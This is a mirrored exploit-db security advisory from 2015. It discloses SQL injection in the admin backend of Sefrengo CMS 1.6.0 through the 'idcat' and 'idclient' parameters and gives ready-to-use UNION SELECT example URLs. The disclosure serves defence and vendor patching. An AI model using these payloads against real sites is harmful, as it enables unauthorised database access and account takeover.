bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/35722.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

72 lines
No EOL
2 KiB
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

Advisory: SQL-Injection in administrative Backend of Sefrengo CMS v.1.6.0
Advisory ID: SROEADV-2015-04
Author: Steffen Rösemann
Affected Software: CMS Sefrengo v.1.6.0 (Release-Date: 18th-Feb-2014)
Vendor URL: http://www.sefrengo.org/start/start.html
Vendor Status: fixed
CVE-ID: -
==========================
Vulnerability Description:
==========================
The Content Management System Sefrengo v.1.6.0 contains SQL-Injection
vulnerabilities in its administrative Backend.
==================
Technical Details:
==================
The administrative Backend of Sefrengo CMS contains a functionality to edit
folders which reside on the CMS. Its located here:
http://{TARGET}/backend/main.php?area=con_configcat&idcat=1&idtplconf=0
The parameter „idcat“ ist vulnerable against SQL-Injection. An attacker
could abuse this to send crafted URLs to the administrator via mail to
execute own SQL commands (e.g. create a second admin-account).
Exploit-Example:
http://
{TARGET}/backend/main.php?area=con_configcat&idcat=1'+and+'1'='2'+union+select+version(),user(),3,4+--+&idtplconf=0
Another SQL-Injection vulnerability can be found in the administrative
backend, where the admin can manage installed plugins. The vulnerable
parameter is „idclient“ in the following URL:
http://{TARGET}/backend/main.php?area=plug&idclient=1
Exploit-Example:
http://
{TARGET}/backend/main.php?area=plug&idclient=1%27+and+%271%27=%272%27+union+select+1,version%28%29,user%28%29,4,database%28%29,6,7,8,9,10,11,12,13,14+--+
=========
Solution:
=========
Update to the latest version
====================
Disclosure Timeline:
====================
21-Dec-2014 found the vulnerability
21-Dec-2014 - informed the developers
22-Dec-2014 - response by vendor
04-Jan-2015 fix by vendor
04-Jan-2015 - release date of this security advisory
04-Jan-2015 - post on BugTraq / FullDisclosure
========
Credits:
========
Vulnerability found and advisory written by Steffen Rösemann.
===========
References:
===========
http://www.sefrengo.org/start/start.html
http://sroesemann.blogspot.de
Reference in a new issue View git blame Copy permalink